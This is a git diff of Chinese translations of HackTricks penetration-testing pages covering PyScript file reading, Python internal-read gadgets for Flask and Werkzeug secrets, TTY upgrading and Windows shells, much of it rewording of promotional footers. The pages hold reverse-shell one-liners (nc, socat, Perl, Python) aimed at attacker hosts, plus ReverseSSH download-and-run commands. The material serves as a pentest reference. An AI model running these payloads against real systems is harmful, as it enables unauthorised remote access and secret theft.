PyScript 是一个新的框架,用于将 Python 集成到 HTML 中,以便与 HTML 一起使用。在这份速查表中,您将了解如何将 PyScript 用于您的渗透测试目的。
|
||||
|
||||
### 从Emscripten虚拟内存文件系统中转储/检索文件:
|
||||
### 从 Emscripten 虚拟内存文件系统中转储/检索文件:
|
||||
|
||||
`CVE ID: CVE-2022-30286`\
|
||||
\
|
||||
|
@ -38,7 +39,7 @@ print(out)
|
|||
|
||||
`CVE ID: CVE-2022-30286`\
|
||||
\
|
||||
Code:
|
||||
代码:
|
||||
```html
|
||||
<py-script>
|
||||
x = "CyberGuy"
|
||||
|
@ -108,16 +109,17 @@ print(" &
|
|||
|
||||
![](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png)
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,35 +1,36 @@
|
|||
# Python内部读取工具
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧**。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## 基本信息
|
||||
|
||||
不同的漏洞,如[**Python格式字符串**](bypass-python-sandboxes/#python-format-string)或[**类污染**](class-pollution-pythons-prototype-pollution.md)可能会允许您**读取Python内部数据,但不允许您执行代码**。因此,渗透测试人员需要充分利用这些读取权限来**获取敏感权限并升级漏洞**。
|
||||
不同的漏洞,如[**Python格式字符串**](bypass-python-sandboxes/#python-format-string)或[**类污染**](class-pollution-pythons-prototype-pollution.md)可能允许您**读取Python内部数据,但不允许您执行代码**。因此,渗透测试人员需要充分利用这些读取权限来**获取敏感权限并升级漏洞**。
|
||||
|
||||
### Flask - 读取密钥
|
||||
|
||||
Flask应用程序的主页可能会有**`app`**全局对象,其中配置了**密钥**。
|
||||
Flask应用程序的主页可能有**`app`**全局对象,其中配置了**密钥**。
|
||||
```python
|
||||
app = Flask(__name__, template_folder='templates')
|
||||
app.secret_key = '(:secret:)'
|
||||
```
|
||||
在这种情况下,可以使用任何小工具来从[绕过Python沙盒页面](bypass-python-sandboxes/)访问全局对象来访问该对象。
|
||||
在这种情况下,可以使用任何小工具来从[Bypass Python sandboxes page](bypass-python-sandboxes/)访问全局对象。
|
||||
|
||||
在**漏洞存在于不同的Python文件中**的情况下,您需要一个小工具来遍历文件以找到主文件,以访问全局对象`app.secret_key`,从而更改Flask密钥并能够[**利用此密钥升级权限**](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign)。
|
||||
|
||||
像这样的有效负载[来自此解决方案](https://ctftime.org/writeup/36082):
|
||||
像这样的有效负载[来自这篇解密文章](https://ctftime.org/writeup/36082):
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```python
|
||||
|
@ -41,7 +42,7 @@ __init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.se
|
|||
|
||||
### Werkzeug - machine\_id 和 node uuid
|
||||
|
||||
[**使用此 writeup 中的有效负载**](https://vozec.fr/writeups/tweedle-dum-dee/),您将能够访问 **machine\_id** 和 **uuid** 节点,这是您需要的**主要秘密**,以便[**生成 Werkzeug pin**](../../network-services-pentesting/pentesting-web/werkzeug.md) ,您可以使用它来访问 `/console` 中的 python 控制台,如果**启用了调试模式**:
|
||||
[**使用此 writeup 中的有效负载**](https://vozec.fr/writeups/tweedle-dum-dee/),您将能够访问 **machine\_id** 和 **uuid** 节点,这是您需要的**主要秘密**,以便[**生成 Werkzeug pin**](../../network-services-pentesting/pentesting-web/werkzeug.md),您可以使用它来访问 `/console` 中的 python 控制台,如果**启用了调试模式**:
|
||||
```python
|
||||
{ua.__class__.__init__.__globals__[t].sys.modules[werkzeug.debug]._machine_id}
|
||||
{ua.__class__.__init__.__globals__[t].sys.modules[werkzeug.debug].uuid._node}
|
||||
|
@ -50,18 +51,19 @@ __init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.se
|
|||
请注意,您可以通过在网页中生成一些错误来获取`app.py`的**服务器本地路径**,这将**提供给您路径**。
|
||||
{% endhint %}
|
||||
|
||||
如果漏洞存在于不同的Python文件中,请检查之前的Flask技巧,以访问主Python文件中的对象。
|
||||
如果漏洞存在于不同的Python文件中,请检查以前的Flask技巧,以访问主Python文件中的对象。
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并实践GCP Hacking:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上**关注**我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧**。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,16 +1,17 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# [**Shells - Linux**](linux.md)
|
||||
|
@ -21,7 +22,7 @@
|
|||
|
||||
# [**Full TTYs**](full-ttys.md)
|
||||
|
||||
# **自动生成的shell**
|
||||
# **自动生成的 shells**
|
||||
|
||||
* [**https://reverse-shell.sh/**](https://reverse-shell.sh/)
|
||||
* [**https://www.revshells.com/**](https://www.revshells.com/)
|
||||
|
@ -36,16 +37,17 @@
|
|||
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,22 +1,23 @@
|
|||
# 完整的TTY
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## 完整的TTY
|
||||
|
||||
请注意,在`SHELL`变量中设置的shell **必须**在 _**/etc/shells**_ 中**列出**,或者`SHELL变量的值未在/etc/shells文件中找到,此事件已报告`。另外,请注意,下面的代码片段仅在bash中有效。如果您使用zsh,请在获取shell之前切换到bash,方法是运行`bash`。
|
||||
请注意,在`SHELL`变量中设置的shell**必须**在_**/etc/shells**_中**列出**,或者`SHELL变量的值未在/etc/shells文件中找到,此事件已被报告`。另外,请注意,下面的代码片段仅在bash中有效。如果您在zsh中,请在通过运行`bash`获取shell之前切换到bash。
|
||||
|
||||
#### Python
|
||||
|
||||
|
@ -29,7 +30,7 @@ python3 -c 'import pty; pty.spawn("/bin/bash")'
|
|||
{% endcode %}
|
||||
|
||||
{% hint style="info" %}
|
||||
您可以执行 **`stty -a`** 来获取 **行数** 和 **列数** 的 **数字**
|
||||
您可以执行**`stty -a`**来获取**行数**和**列数**的**数字**
|
||||
{% endhint %}
|
||||
|
||||
#### 脚本
|
||||
|
@ -49,7 +50,7 @@ socat file:`tty`,raw,echo=0 tcp-listen:4444
|
|||
#Victim:
|
||||
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
|
||||
```
|
||||
### 生成shell
|
||||
### **生成shell**
|
||||
|
||||
* `python -c 'import pty; pty.spawn("/bin/sh")'`
|
||||
* `echo os.system('/bin/bash')`
|
||||
|
@ -64,13 +65,13 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
|
|||
* vi: `:set shell=/bin/bash:shell`
|
||||
* nmap: `!sh`
|
||||
|
||||
## 反向SSH
|
||||
## **反向SSH**
|
||||
|
||||
一个方便的方式,用于**交互式shell访问**,以及**文件传输**和**端口转发**,是将静态链接的ssh服务器[ReverseSSH](https://github.com/Fahrj/reverse-ssh)放到目标上。
|
||||
一个方便的方式,用于**交互式shell访问**,以及**文件传输**和**端口转发**,是将静态链接的ssh服务器[ReverseSSH](https://github.com/Fahrj/reverse-ssh)放到目标机器上。
|
||||
|
||||
以下是一个针对`x86`的示例,使用upx压缩的二进制文件。对于其他二进制文件,请查看[发布页面](https://github.com/Fahrj/reverse-ssh/releases/latest/)。
|
||||
以下是针对`x86`架构使用upx压缩二进制文件的示例。对于其他二进制文件,请查看[发布页面](https://github.com/Fahrj/reverse-ssh/releases/latest/)。
|
||||
|
||||
1. 在本地准备以捕获ssh端口转发请求:
|
||||
1. 在本地准备捕获ssh端口转发请求:
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
|
@ -82,6 +83,8 @@ wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_revers
|
|||
{% endcode %}
|
||||
|
||||
* (2a) Linux目标:
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
# Drop it via your preferred way, e.g.
|
||||
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
|
||||
|
@ -90,14 +93,16 @@ wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_revers
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
* (2b) Windows 10目标(对于早期版本,请查看[项目自述](https://github.com/Fahrj/reverse-ssh#features)):
|
||||
* (2b) Windows 10目标(对于早期版本,请查看[项目自述](https://github.com/Fahrj/reverse-ssh#features)):
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
# Drop it via your preferred way, e.g.
|
||||
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe
|
||||
|
||||
reverse-ssh.exe -p 4444 kali@10.0.0.2
|
||||
```
|
||||
* 如果ReverseSSH端口转发请求成功,您现在应该能够使用默认密码`letmeinbrudipls`登录,以运行`reverse-ssh(.exe)`的用户的身份:
|
||||
* 如果ReverseSSH端口转发请求成功,您现在应该能够使用默认密码`letmeinbrudipls`登录,登录用户为运行`reverse-ssh(.exe)`的用户:
|
||||
```bash
|
||||
# Interactive shell access
|
||||
ssh -p 8888 127.0.0.1
|
||||
|
@ -105,22 +110,23 @@ ssh -p 8888 127.0.0.1
|
|||
# Bidirectional file transfer
|
||||
sftp -P 8888 127.0.0.1
|
||||
```
|
||||
## 无 TTY
|
||||
## 没有 TTY
|
||||
|
||||
如果由于某种原因无法获得完整的 TTY,则**仍然可以与期望用户输入的程序进行交互**。在以下示例中,密码被传递给 `sudo` 以读取文件:
|
||||
```bash
|
||||
expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
|
||||
```
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,18 +1,19 @@
|
|||
# Shells - Windows
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github 仓库提交 PR 来分享黑客技巧。**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**Try Hard Security Group**
|
||||
|
||||
|
@ -24,8 +25,8 @@
|
|||
|
||||
## Lolbas
|
||||
|
||||
页面[lolbas-project.github.io](https://lolbas-project.github.io/)是为Windows准备的,就像[https://gtfobins.github.io/](https://gtfobins.github.io/)是为Linux准备的。\
|
||||
显然,在Windows中**没有SUID文件或sudo权限**,但了解一些**二进制文件**如何(被)滥用以执行某种意外操作,比如**执行任意代码**是很有用的。
|
||||
页面[lolbas-project.github.io](https://lolbas-project.github.io/)是为 Windows 设计的,就像[https://gtfobins.github.io/](https://gtfobins.github.io/)是为 Linux 设计的。\
|
||||
显然,在 Windows 中**没有 SUID 文件或 sudo 特权**,但了解一些**二进制文件**如何被(滥)用来执行某种意外操作是很有用的,比如**执行任意代码。**
|
||||
|
||||
## NC
|
||||
```bash
|
||||
|
@ -33,7 +34,7 @@ nc.exe -e cmd.exe <Attacker_IP> <PORT>
|
|||
```
|
||||
## SBD
|
||||
|
||||
**[sbd](https://www.kali.org/tools/sbd/)是一种便携且安全的Netcat替代工具**。它适用于类Unix系统和Win32。具有强加密、程序执行、可定制源端口和持续重新连接等功能,sbd为TCP/IP通信提供了多功能解决方案。对于Windows用户,可以使用Kali Linux发行版中的sbd.exe版本作为可靠的Netcat替代品。
|
||||
**[sbd](https://www.kali.org/tools/sbd/)是一个便携且安全的Netcat替代品**。它适用于类Unix系统和Win32。具有强加密、程序执行、可定制源端口和持续重新连接等功能,sbd为TCP/IP通信提供了多功能解决方案。对于Windows用户,可以使用来自Kali Linux发行版的sbd.exe版本作为Netcat的可靠替代品。
|
||||
```bash
|
||||
# Victims machine
|
||||
sbd -l -p 4444 -e bash -v -n
|
||||
|
@ -54,21 +55,21 @@ C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('1
|
|||
```
|
||||
## Perl
|
||||
|
||||
Perl是一种通用的脚本语言,可用于在Windows系统上执行各种任务。Perl脚本可以用于执行系统命令、文件操作、网络通信等操作。Perl在Windows系统上的使用非常灵活,可以通过Perl脚本轻松实现各种自定义功能。
|
||||
Perl是一种通用的脚本语言,广泛用于系统管理、文本处理、网络编程等领域。Perl脚本可以在Windows系统上运行,提供了强大的功能和灵活性。
|
||||
```bash
|
||||
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
